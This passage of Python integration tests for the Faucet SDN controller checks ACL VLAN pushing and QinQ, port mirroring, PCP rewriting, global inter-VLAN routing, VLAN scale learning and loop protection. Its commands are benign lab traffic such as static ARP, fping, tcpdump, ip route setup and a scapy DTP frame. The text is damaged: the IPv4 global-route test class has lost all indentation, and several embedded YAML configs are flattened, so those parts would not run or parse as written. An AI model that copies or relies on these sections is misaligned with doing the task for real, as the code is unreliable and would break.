            dl_dst: "01:02:03:04:05:06"
            actions:
                output:
                    vlan_vid: 123
                    set_fields:
                        - eth_dst: "06:06:06:06:06:06"
                    port: %(port_2)d
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        """Rewritten eth_dst and VLAN 123 tag are observed at port_2."""
        first_host, second_host = self.hosts_name_ordered()[0:2]
        # we expect to see the rewritten address and VLAN
        tcpdump_filter = ('icmp and ether dst 06:06:06:06:06:06')
        # Static ARP forces traffic to the dl_dst the ACL matches on.
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
                lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
        self.assertTrue(re.search(
            '%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
        self.assertTrue(re.search(
            'vlan 123', tcpdump_txt))
class FaucetUntaggedOrderedOutputTest(FaucetUntaggedTest):
    """Same as FaucetUntaggedOutputTest, using ordered output syntax."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        unicast_flood: False
acls:
    1:
        - rule:
            dl_dst: "01:02:03:04:05:06"
            actions:
                output:
                    - vlan_vid: 123
                    - set_fields:
                        - eth_dst: "06:06:06:06:06:06"
                    - port: %(port_2)d
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        """Rewritten eth_dst and VLAN 123 tag are observed at port_2."""
        first_host, second_host = self.hosts_name_ordered()[0:2]
        # we expect to see the rewritten address and VLAN
        tcpdump_filter = ('icmp and ether dst 06:06:06:06:06:06')
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
                lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
        self.assertTrue(re.search(
            '%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
        self.assertTrue(re.search(
            'vlan 123', tcpdump_txt))
class FaucetUntaggedMultiVlansOutputTest(FaucetUntaggedTest):
    """ACL output action pushes multiple (stacked) VLAN tags."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        unicast_flood: False
acls:
    1:
        - rule:
            dl_dst: "01:02:03:04:05:06"
            actions:
                output:
                    set_fields:
                        - eth_dst: "06:06:06:06:06:06"
                    vlan_vids: [123, 456]
                    port: %(port_2)d
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        """Both VLAN tags (456 outer, 123 inner) are observed at port_2."""
        first_host, second_host = self.hosts_name_ordered()[0:2]
        # we expect to see the rewritten address and VLAN
        tcpdump_filter = 'vlan'
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
                lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
        self.assertTrue(re.search(
            '%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
        self.assertTrue(re.search(
            'vlan 456.+vlan 123', tcpdump_txt))
class FaucetUntaggedMultiVlansOrderedOutputTest(FaucetUntaggedTest):
    """Same as FaucetUntaggedMultiVlansOutputTest, using ordered output syntax."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        unicast_flood: False
acls:
    1:
        - rule:
            dl_dst: "01:02:03:04:05:06"
            actions:
                output:
                    - set_fields:
                        - eth_dst: "06:06:06:06:06:06"
                    - vlan_vids: [123, 456]
                    - port: %(port_2)d
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        """Both VLAN tags (456 outer, 123 inner) are observed at port_2."""
        first_host, second_host = self.hosts_name_ordered()[0:2]
        # we expect to see the rewritten address and VLAN
        tcpdump_filter = 'vlan'
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
                lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
        self.assertTrue(re.search(
            '%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
        self.assertTrue(re.search(
            'vlan 456.+vlan 123', tcpdump_txt))
class FaucetUntaggedMultiConfVlansOutputTest(FaucetUntaggedTest):
    """ACL output pushes stacked VLANs with a QinQ (0x88a8) outer ethertype."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        unicast_flood: False
acls:
    1:
        - rule:
            dl_dst: "01:02:03:04:05:06"
            actions:
                output:
                    set_fields:
                        - eth_dst: "06:06:06:06:06:06"
                    vlan_vids: [{vid: 123, eth_type: 0x88a8}, 456]
                    port: %(port_2)d
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        """QinQ-tagged (802.1ad) frames are observed at port_2."""
        first_host, second_host = self.hosts_name_ordered()[0:2]
        # we expect to see the rewritten address and VLAN
        tcpdump_filter = 'ether proto 0x88a8'
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
                lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
            packets=1)
        self.assertTrue(re.search(
            '%s: ICMP echo request' % second_host.IP(), tcpdump_txt), msg=tcpdump_txt)
        self.assertTrue(re.search(
            r'vlan 456.+ethertype 802\.1Q-QinQ \(0x88a8\), vlan 123', tcpdump_txt), msg=tcpdump_txt)
class FaucetUntaggedMultiConfVlansOrderedOutputTest(FaucetUntaggedTest):
    """Same as FaucetUntaggedMultiConfVlansOutputTest, ordered output syntax."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        unicast_flood: False
acls:
    1:
        - rule:
            dl_dst: "01:02:03:04:05:06"
            actions:
                output:
                    - set_fields:
                        - eth_dst: "06:06:06:06:06:06"
                    - vlan_vids: [{vid: 123, eth_type: 0x88a8}, 456]
                    - port: %(port_2)d
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        """QinQ-tagged (802.1ad) frames are observed at port_2."""
        first_host, second_host = self.hosts_name_ordered()[0:2]
        # we expect to see the rewritten address and VLAN
        tcpdump_filter = 'ether proto 0x88a8'
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
                lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
            packets=1)
        self.assertTrue(re.search(
            '%s: ICMP echo request' % second_host.IP(), tcpdump_txt), msg=tcpdump_txt)
        self.assertTrue(re.search(
            r'vlan 456.+ethertype 802\.1Q-QinQ \(0x88a8\), vlan 123', tcpdump_txt), msg=tcpdump_txt)
class FaucetUntaggedMirrorTest(FaucetUntaggedTest):
    """Dynamically add/remove a port mirror and check forwarding performance."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                output_only: True
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        """Mirroring works when added at runtime and performance holds either way."""
        first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
        first_host_ip = ipaddress.ip_address(first_host.IP())
        second_host_ip = ipaddress.ip_address(second_host.IP())
        self.flap_all_switch_ports()
        # Add mirror, test performance.
        self.change_port_config(
            self.port_map['port_3'], 'mirror', self.port_map['port_1'],
            restart=True, cold_start=False)
        self.verify_ping_mirrored(first_host, second_host, mirror_host)
        self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
        self.verify_iperf_min(
            ((first_host, self.port_map['port_1']),
             (second_host, self.port_map['port_2'])),
            MIN_MBPS, first_host_ip, second_host_ip,
            sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
        # Remove mirror, test performance.
        self.change_port_config(
            self.port_map['port_3'], 'mirror', [],
            restart=True, cold_start=False)
        self.verify_iperf_min(
            ((first_host, self.port_map['port_1']),
             (second_host, self.port_map['port_2'])),
            MIN_MBPS, first_host_ip, second_host_ip,
            sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
class FaucetUntaggedMultiMirrorTest(FaucetUntaggedTest):
    """One mirror port mirroring multiple source ports at once."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                output_only: True
            %(port_4)d:
                output_only: True
"""

    def test_untagged(self):
        """Pings in both directions appear on the shared mirror port."""
        first_host, second_host, mirror_host = self.hosts_name_ordered()[:3]
        ping_pairs = (
            (first_host, second_host),
            (second_host, first_host))
        self.flap_all_switch_ports()
        # Mirror both host ports to port_3 at runtime.
        self.change_port_config(
            self.port_map['port_3'], 'mirror',
            [self.port_map['port_1'], self.port_map['port_2']],
            restart=True, cold_start=False, hup=True)
        self.verify_ping_mirrored_multi(
            ping_pairs, mirror_host, both_mirrored=True)
class FaucetUntaggedMultiMirrorSepTest(FaucetUntaggedTest):
    """Two separate mirror ports each mirroring the same source port."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        unicast_flood: False
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                mirror: %(port_1)d
            %(port_4)d:
                mirror: %(port_1)d
"""

    def test_untagged(self):
        """Both mirror ports receive copies of port 1's traffic."""
        self.flap_all_switch_ports()
        # Make sure the two hosts both mirror from port 1
        first_host, second_host = self.hosts_name_ordered()[0:2]
        mirror_host = self.hosts_name_ordered()[2]
        self.verify_ping_mirrored(first_host, second_host, mirror_host)
        mirror_host = self.hosts_name_ordered()[3]
        self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetTaggedTest(FaucetTest):
    """Base test: all hosts on a single tagged VLAN."""

    N_UNTAGGED = 0
    N_TAGGED = 4
    LINKS_PER_HOST = 1
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "tagged"
"""
    CONFIG = CONFIG_TAGGED_BOILER

    def setUp(self):
        """Build a topology with 4 tagged hosts."""
        super().setUp()
        self.topo = self.topo_class(
            self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
            n_tagged=4, links_per_host=self.LINKS_PER_HOST,
            hw_dpid=self.hw_dpid)
        self.start_net()

    def test_tagged(self):
        """Tagged hosts learn and ping; untagged input is dropped."""
        # Untagged traffic specifically dropped.
        for host in self.hosts_name_ordered():
            host.cmd(self.scapy_dhcp(host.MAC(), host.intf_root_name, count=3))
        for port in self.port_map.values():
            # vlan_tci 0 (untagged) should hit a drop rule and be counted.
            self.wait_nonzero_packet_count_flow(
                {'in_port': port, 'vlan_tci': '0x0000/0x1fff'}, table_id=self._VLAN_TABLE)
        self.ping_all_when_learned()
class FaucetTaggedDTPTest(FaucetTaggedTest):
    """Tagged operation is unaffected by Cisco DTP trunk negotiation frames."""

    def test_tagged(self):
        """Send DTP negotiation from each host, then run the base tagged test."""
        for host in self.hosts_name_ordered():
            scapy_txt = host.cmd(
                ('python3 -c \"import sys ; from scapy.contrib.dtp import * ;'
                 'negotiate_trunk(iface=\'%s\')\"' % host.intf_root_name))
            self.assertTrue(re.search('Sent 1 packets', scapy_txt), msg=scapy_txt)
        super().test_tagged()
class FaucetTaggedMirrorTest(FaucetTaggedTest):
    """Mirroring a tagged port; flows survive mirror removal."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "tagged"
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                tagged_vlans: [100]
            %(port_2)d:
                tagged_vlans: [100]
            %(port_3)d:
                # port 3 will mirror port 1
                mirror: %(port_1)d
            %(port_4)d:
                tagged_vlans: [100]
"""

    def test_tagged(self):
        """Mirroring works, performance holds, and VLAN flows persist."""
        first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
        self.flap_all_switch_ports()
        self.verify_ping_mirrored(first_host, second_host, mirror_host)
        self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
        first_host_ip = ipaddress.ip_address(first_host.IP())
        second_host_ip = ipaddress.ip_address(second_host.IP())
        self.verify_iperf_min(
            ((first_host, self.port_map['port_1']),
             (second_host, self.port_map['port_2'])),
            MIN_MBPS, first_host_ip, second_host_ip,
            sync_counters_func=lambda: self.one_ipv4_ping(first_host, second_host_ip))
        tagged_ports = (self.port_map['port_1'], self.port_map['port_2'], self.port_map['port_4'])
        for port in tagged_ports:
            self.wait_until_matching_flow(
                {'vlan_vid': 100, 'in_port': port},
                table_id=self._VLAN_TABLE,
                actions=['GOTO_TABLE:%u' % self._ETH_SRC_TABLE])
        # Remove the mirror at runtime; VLAN flows must remain intact.
        self.change_port_config(
            self.port_map['port_3'], 'mirror', None,
            restart=True, cold_start=False)
        for port in tagged_ports:
            self.wait_until_matching_flow(
                {'vlan_vid': 100, 'in_port': port},
                table_id=self._VLAN_TABLE,
                actions=['GOTO_TABLE:%u' % self._ETH_SRC_TABLE])
class FaucetTaggedVLANPCPTest(FaucetTaggedTest):
    """ACL matches VLAN PCP 1 and rewrites it to PCP 2."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "tagged"
acls:
    1:
        - rule:
            vlan_vid: 100
            vlan_pcp: 1
            actions:
                output:
                    set_fields:
                        - vlan_pcp: 2
                allow: 1
        - rule:
            actions:
                allow: 1
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                tagged_vlans: [100]
                acl_in: 1
            %(port_2)d:
                tagged_vlans: [100]
            %(port_3)d:
                tagged_vlans: [100]
            %(port_4)d:
                tagged_vlans: [100]
"""

    def test_tagged(self):
        """Frames sent with PCP 1 arrive at the peer carrying PCP 2."""
        first_host, second_host = self.hosts_name_ordered()[:2]
        # Map all egress skb priorities to VLAN PCP 1 on the sender.
        self.quiet_commands(
            first_host,
            ['ip link set %s type vlan egress %u:1' % (
                first_host.defaultIntf(), i) for i in range(0, 8)])
        self.one_ipv4_ping(first_host, second_host.IP())
        self.wait_nonzero_packet_count_flow(
            {'vlan_vid': 100, 'vlan_pcp': 1}, table_id=self._PORT_ACL_TABLE)
        tcpdump_filter = 'ether dst %s' % second_host.MAC()
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'ping -c3 %s' % second_host.IP())], root_intf=True, packets=1)
        self.assertTrue(re.search('vlan 100, p 2,', tcpdump_txt))
class FaucetTaggedVLANPCPOrderedTest(FaucetTaggedTest):
    """Same as FaucetTaggedVLANPCPTest, using ordered output syntax."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "tagged"
acls:
    1:
        - rule:
            vlan_vid: 100
            vlan_pcp: 1
            actions:
                output:
                    - set_fields:
                        - vlan_pcp: 2
                allow: 1
        - rule:
            actions:
                allow: 1
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                tagged_vlans: [100]
                acl_in: 1
            %(port_2)d:
                tagged_vlans: [100]
            %(port_3)d:
                tagged_vlans: [100]
            %(port_4)d:
                tagged_vlans: [100]
"""

    def test_tagged(self):
        """Frames sent with PCP 1 arrive at the peer carrying PCP 2."""
        first_host, second_host = self.hosts_name_ordered()[:2]
        # Map all egress skb priorities to VLAN PCP 1 on the sender.
        self.quiet_commands(
            first_host,
            ['ip link set %s type vlan egress %u:1' % (
                first_host.defaultIntf(), i) for i in range(0, 8)])
        self.one_ipv4_ping(first_host, second_host.IP())
        self.wait_nonzero_packet_count_flow(
            {'vlan_vid': 100, 'vlan_pcp': 1}, table_id=self._PORT_ACL_TABLE)
        tcpdump_filter = 'ether dst %s' % second_host.MAC()
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(
                    'ping -c3 %s' % second_host.IP())], root_intf=True, packets=1)
        self.assertTrue(re.search('vlan 100, p 2,', tcpdump_txt))
class FaucetTaggedGlobalIPv4RouteTest(FaucetTaggedTest):
def _vids(): # pylint: disable=no-method-argument,no-self-use
return list(range(100, 148))
def global_vid(): # pylint: disable=no-method-argument,no-self-use
return 2047
IPV = 4
NETPREFIX = 24
ETH_TYPE = IPV4_ETH
NETNS = True
VIDS = _vids()
GLOBAL_VID = global_vid()
STR_VIDS = [str(i) for i in _vids()]
NEW_VIDS = VIDS[1:]
@staticmethod
def netbase(vid, host):
return ipaddress.ip_interface('192.168.%u.%u' % (vid, host))
def fping(self, macvlan_int, ipg):
return 'fping %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
self.FPING_ARGS_SHORT, macvlan_int, ipg)
def fib_table(self):
return self._IPV4_FIB_TABLE
def macvlan_ping(self, host, ipa, macvlan_int):
return self.one_ipv4_ping(host, ipa, intf=macvlan_int)
def run_ip(self, args):
return 'ip -%u %s' % (self.IPV, args)
CONFIG_GLOBAL = """
routers:
global:
vlans: [%s]
vlans:
%s
""" % (
','.join(STR_VIDS),
'\n'.join(['\n'.join(
(' %u:',
' description: "tagged"',
' faucet_vips: ["192.168.%u.254/24"]')) % (i, i) for i in VIDS]))
CONFIG = """
global_vlan: %u
proactive_learn_v4: True
max_wildcard_table_size: 1024
table_sizes:
vlan: %u
vip: %u
flood: %u
interfaces:
%s:
mirror: %s
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
""" % (global_vid(),
len(STR_VIDS) * 3, # VLAN
len(STR_VIDS) * 2, # VIP
len(STR_VIDS) * 12, # Flood
'%(port_3)d', '%(port_1)d', '%(port_1)d',
','.join(STR_VIDS), '%(port_2)d', ','.join(STR_VIDS))
def configure_mesh(self, first_host, second_host):
hosts = (first_host, second_host)
required_ipds = set()
ipd_to_macvlan = {}
for i, host in enumerate(hosts, start=1):
setup_commands = []
for vid in self.NEW_VIDS:
vlan_int = '%s.%u' % (host.intf_root_name, vid)
macvlan_int = 'macvlan%u' % vid
ipa = self.netbase(vid, i)
ipg = self.netbase(vid, 254)
ipd = self.netbase(vid, 253)
required_ipds.add(str(ipd.ip))
ipd_to_macvlan[str(ipd.ip)] = (macvlan_int, host)
setup_commands.extend([
self.run_ip('link add link %s name %s type vlan id %u' % (
host.intf_root_name, vlan_int, vid)),
self.run_ip('link set dev %s up' % vlan_int),
self.run_ip('link add %s link %s type macvlan mode vepa' % (macvlan_int, vlan_int)),
self.run_ip('link set dev %s up' % macvlan_int),
self.run_ip('address add %s/%u dev %s' % (ipa.ip, self.NETPREFIX, macvlan_int)),
self.run_ip('route add default via %s table %u' % (ipg.ip, vid)),
self.run_ip('rule add from %s table %u priority 100' % (ipa, vid)),
# stimulate learning attempts for down host.
self.run_ip('neigh add %s lladdr %s dev %s' % (ipd.ip, self.FAUCET_MAC, macvlan_int))])
# next host routes via FAUCET for other host in same connected subnet
# to cause routing to be exercised.
for j, _ in enumerate(hosts, start=1):
if j != i:
other_ip = self.netbase(vid, j)
setup_commands.append(
self.run_ip('route add %s via %s table %u' % (other_ip, ipg.ip, vid)))
for ipa in (ipg.ip, ipd.ip):
setup_commands.append(self.fping(macvlan_int, ipa))
self.quiet_commands(host, setup_commands)
return required_ipds, ipd_to_macvlan
def verify_drop_rules(self, required_ipds, ipd_to_macvlan):
for _ in range(10):
if not required_ipds:
break
drop_rules = self.get_matching_flows_on_dpid(
self.dpid, {'dl_type': self.ETH_TYPE, 'dl_vlan': str(self.GLOBAL_VID)},
table_id=self.fib_table(), actions=[])
if drop_rules:
for drop_rule in drop_rules:
match = drop_rule['match']
del match['dl_type']
del match['dl_vlan']
self.assertEqual(1, len(match))
ipd = list(match.values())[0].split('/')[0]
if ipd in required_ipds:
required_ipds.remove(ipd)
for ipd in required_ipds:
macvlan_int, host = ipd_to_macvlan[ipd]
host.cmd(self.fping(macvlan_int, ipd))
time.sleep(1)
self.assertFalse(required_ipds, msg='no drop rules for %s' % required_ipds)
def verify_routing_performance(self, first_host, second_host):
for first_host_ip, second_host_ip in (
(self.netbase(self.NEW_VIDS[0], 1), self.netbase(self.NEW_VIDS[0], 2)),
(self.netbase(self.NEW_VIDS[0], 1), self.netbase(self.NEW_VIDS[-1], 2)),
(self.netbase(self.NEW_VIDS[-1], 1), self.netbase(self.NEW_VIDS[0], 2))):
self.verify_iperf_min(
((first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])),
MIN_MBPS, first_host_ip.ip, second_host_ip.ip,
sync_counters_func=lambda: self.scapy_bcast(first_host))
def verify_l3_mesh(self, first_host, second_host):
for vid in self.NEW_VIDS:
macvlan_int = 'macvlan%u' % vid
first_host_ip = self.netbase(vid, 1)
second_host_ip = self.netbase(vid, 2)
self.macvlan_ping(first_host, second_host_ip.ip, macvlan_int)
self.macvlan_ping(second_host, first_host_ip.ip, macvlan_int)
def verify_l3_hairpin(self, first_host):
macvlan1_int = 'macvlan%u' % self.NEW_VIDS[0]
macvlan2_int = 'macvlan%u' % self.NEW_VIDS[1]
macvlan2_ip = self.netbase(self.NEW_VIDS[1], 1)
macvlan1_gw = self.netbase(self.NEW_VIDS[0], 254)
macvlan2_gw = self.netbase(self.NEW_VIDS[1], 254)
netns = self.hostns(first_host)
setup_cmds = []
setup_cmds.extend(
[self.run_ip('link set %s netns %s' % (macvlan2_int, netns))])
for exec_cmd in (
(self.run_ip('address add %s/%u dev %s' % (macvlan2_ip.ip, self.NETPREFIX, macvlan2_int)),
self.run_ip('link set %s up' % macvlan2_int),
self.run_ip('route add default via %s' % macvlan2_gw.ip))):
setup_cmds.append('ip netns exec %s %s' % (netns, exec_cmd))
setup_cmds.append(
self.run_ip('route add %s via %s' % (macvlan2_ip, macvlan1_gw.ip)))
self.quiet_commands(first_host, setup_cmds)
self.macvlan_ping(first_host, macvlan2_ip.ip, macvlan1_int)
def test_tagged(self):
    """Run the full mesh setup, drop-rule, performance, routing and mirror checks."""
    first_host, second_host, mirror_host = self.hosts_name_ordered()[:3]
    required_ipds, ipd_to_macvlan = self.configure_mesh(first_host, second_host)
    self.verify_drop_rules(required_ipds, ipd_to_macvlan)
    self.verify_routing_performance(first_host, second_host)
    self.verify_l3_mesh(first_host, second_host)
    self.verify_l3_hairpin(first_host)
    self.verify_ping_mirrored(first_host, second_host, mirror_host)
    self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host)
class FaucetTaggedGlobalIPv6RouteTest(FaucetTaggedGlobalIPv4RouteTest):
    """IPv6 variant of the global-VLAN inter-VLAN routing test."""

    IPV = 6  # IP family flag used by run_ip() and ping helpers.
    NETPREFIX = 112
    ETH_TYPE = IPV6_ETH

    def _vids():  # pylint: disable=no-method-argument,no-self-use
        """Return the VLAN IDs used by this test."""
        return list(range(100, 103))

    def global_vid():  # pylint: disable=no-method-argument,no-self-use
        """Return the VID of the global routing VLAN."""
        return 2047

    VIDS = _vids()
    GLOBAL_VID = global_vid()
    STR_VIDS = [str(i) for i in _vids()]
    NEW_VIDS = VIDS[1:]

    def netbase(self, vid, host):
        """Return an IPv6 interface address derived from VLAN and host IDs."""
        return ipaddress.ip_interface('fc00::%u:%u' % (vid, host))

    def fib_table(self):
        """Return the IPv6 FIB table ID."""
        return self._IPV6_FIB_TABLE

    def fping(self, macvlan_int, ipg):
        """Return an fping6 command line bound to macvlan_int."""
        return 'fping6 %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
            self.FPING_ARGS_SHORT, macvlan_int, ipg)

    def macvlan_ping(self, host, ipa, macvlan_int):
        """Single IPv6 ping from host out of macvlan_int."""
        return self.one_ipv6_ping(host, ipa, intf=macvlan_int)

    def run_ip(self, args):
        """Return an ip(8) command line with the IPv6 family flag."""
        return 'ip -%u %s' % (self.IPV, args)

    CONFIG_GLOBAL = """
routers:
global:
vlans: [%s]
vlans:
%s
""" % (
        ','.join(STR_VIDS),
        '\n'.join(['\n'.join(
            (' %u:',
             ' description: "tagged"',
             ' faucet_vips: ["fc00::%u:254/112"]')) % (i, i) for i in VIDS]))

    CONFIG = """
global_vlan: %u
proactive_learn_v6: True
max_wildcard_table_size: 512
table_sizes:
vlan: 256
vip: 128
flood: 384
interfaces:
%s:
mirror: %s
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
%s:
native_vlan: 99
tagged_vlans: [%s]
hairpin_unicast: True
""" % (global_vid(), '%(port_3)d', '%(port_1)d', '%(port_1)d',
       ','.join(STR_VIDS), '%(port_2)d', ','.join(STR_VIDS))
class FaucetTaggedScaleTest(FaucetTaggedTest):
    """Scale test: many tagged VLANs per port; verify hosts learned per VLAN.

    Fix: the per-VLAN learning-retry loop previously built ``vlan_int`` from
    the stale loop variables ``host`` and ``vid`` left over from the setup
    loops above it, so every retry ran rdisc6 on one interface belonging to
    the last host/VID instead of the host and VLAN actually being checked.
    ``vlan_int`` is now computed per host per VLAN inside the retry loop.
    """

    def _vids():  # pylint: disable=no-method-argument,no-self-use
        """Return the VLAN IDs used by this test."""
        return list(range(100, 148))

    VIDS = _vids()
    STR_VIDS = [str(i) for i in _vids()]
    # All VIDs except the base test's first VLAN.
    NEW_VIDS = VIDS[1:]

    CONFIG_GLOBAL = """
vlans:
""" + '\n'.join(['\n'.join(
        (' %u:',
         ' description: "tagged"')) % i for i in VIDS])

    CONFIG = """
interfaces:
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
%s:
tagged_vlans: [%s]
""" % ('%(port_1)d', ','.join(STR_VIDS),
       '%(port_2)d', ','.join(STR_VIDS),
       '%(port_3)d', ','.join(STR_VIDS),
       '%(port_4)d', ','.join(STR_VIDS))

    def test_tagged(self):
        """Create one VLAN subinterface per VID per host; verify learning on each VLAN."""
        self.ping_all_when_learned()
        # Create and enable a VLAN subinterface for every new VID on each host.
        for host in self.hosts_name_ordered():
            setup_commands = []
            for vid in self.NEW_VIDS:
                vlan_int = '%s.%u' % (host.intf_root_name, vid)
                setup_commands.extend([
                    'ip link add link %s name %s type vlan id %u' % (
                        host.intf_root_name, vlan_int, vid),
                    'ip link set dev %s up' % vlan_int])
            self.quiet_commands(host, setup_commands)
        # Send initial router solicitations on every subinterface to trigger learning.
        for host in self.hosts_name_ordered():
            rdisc6_commands = []
            for vid in self.NEW_VIDS:
                vlan_int = '%s.%u' % (host.intf_root_name, vid)
                rdisc6_commands.append(
                    'rdisc6 -r2 -w1 -q %s 2> /dev/null' % vlan_int)
            self.quiet_commands(host, rdisc6_commands)
        # Per VLAN, retry solicitation up to 3 times until all hosts learned.
        for vlan in self.NEW_VIDS:
            vlan_hosts_learned = 0
            for _ in range(3):
                for host in self.hosts_name_ordered():
                    # Fixed: interface derived from THIS host and THIS VLAN
                    # (was reusing stale host/vid from the setup loops).
                    vlan_int = '%s.%u' % (host.intf_root_name, vlan)
                    self.quiet_commands(
                        host,
                        ['rdisc6 -r2 -w1 -q %s 2> /dev/null' % vlan_int])
                vlan_hosts_learned = self.scrape_prometheus_var(
                    'vlan_hosts_learned', {'vlan': str(vlan)})
                if vlan_hosts_learned == len(self.hosts_name_ordered()):
                    break
                time.sleep(1)
            self.assertGreater(
                vlan_hosts_learned, 1,
                msg='not all VLAN %u hosts learned (%u)' % (vlan, vlan_hosts_learned))
class FaucetTaggedBroadcastTest(FaucetTaggedTest):
    """Base tagged test plus broadcast flood and no-broadcast-to-self checks."""

    def test_tagged(self):
        """Run the base tagged test, then verify broadcast behavior."""
        super().test_tagged()
        self.verify_broadcast()
        self.verify_no_bcast_to_self()
class FaucetTaggedExtLoopProtectTest(FaucetTaggedTest):
    """Verify loop_protect_external on tagged ports.

    Ports 1 and 2 are marked external; broadcast between them must be
    blocked while internal ports still flood and forward normally.
    """

    CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
loop_protect_external: True
%(port_2)d:
tagged_vlans: [100]
loop_protect_external: True
%(port_3)d:
tagged_vlans: [100]
%(port_4)d:
tagged_vlans: [100]
"""

    def test_tagged(self):
        """Broadcast blocked external<->external; allowed internal<->internal."""
        ext_port1, ext_port2, int_port1, int_port2 = self.hosts_name_ordered()
        self.verify_broadcast((ext_port1, ext_port2), False)
        self.verify_broadcast((int_port1, int_port2), True)
        self.verify_unicast((int_port1, int_port2), True)
class FaucetTaggedWithUntaggedTest(FaucetTaggedTest):
    """Ports carry VLAN 100 tagged and VLAN 200 native simultaneously."""

    N_UNTAGGED = 0
    N_TAGGED = 4
    LINKS_PER_HOST = 1

    CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
200:
